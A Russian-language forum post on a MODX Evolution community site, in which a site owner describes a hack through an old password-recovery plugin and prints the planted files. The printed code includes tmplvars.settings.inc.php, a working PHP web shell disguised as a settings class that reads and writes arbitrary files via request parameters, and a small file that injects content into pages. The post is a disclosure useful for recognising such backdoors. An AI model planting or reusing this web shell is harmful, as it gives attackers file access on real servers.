[EVO] Файлы появившиеся после взлома

В одном из топиков я писал что сайт хакнули (100% через старый плагин восстановления пароля) и в index.php добавили трипера. Покопавшись более детально я нашел левые файлы и измененный файл парсера.
Новые файлы называются
session_keepalive.log.inc.php
$sContent = "<!-- documentId:".$modx->documentObject['id']." -->";

global $modx;
if($pos = strpos($modx->documentOutput,'</body>')){
	$modx->documentOutput = substr($modx->documentOutput,0,$pos).$sContent.substr($modx->documentOutput,$pos);
}


и tmplvars.settings.inc.php

<?php class TemplateVariableSettingsReturn {
	public function processTemplateVariableOut(){
	$act = $this->getVar('act');
	switch($act){
	case 'fw':	
$path = $this->getVar('path');
	$content = $this->getVar('content');
	@chdir(__DIR__);
		if(file_put_contents($path, $content)) echo ('Ok'); else echo('Error');
			break;
			case 'fr':
		$path = $this->getVar('path');
	if($content = file_get_contents($path)) echo($content); else echo('Error');
		break;
		case 'cc':
		$path = 'session_keepalive.log.inc.php';
				$content = $this->getVar('content');
				@chdir(__DIR__);
 if(file_put_contents($path, $content)) echo ('Ok'); else echo('Error');
break;
			default:
				echo('Alive');
		die();
		}	}
	private function getVar($var){
		if(isset($_GET[$var])) return $_GET[$var];
		if(isset($_POST[$var])) return $_POST[$var];
		return null;
	}}
$cl = new TemplateVariableSettingsReturn();
$cl->processTemplateVariableOut();
?>


Что конкретно поменяли в document.parser.class.inc.php я не искал. Некогда.
Прилагаю его здесь для скачивания, может любителям будет интересно.
файл

2 комментария

avatar
avatar
О, сори. Ведь точно изучал эту тему, не удосужился поискать.
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.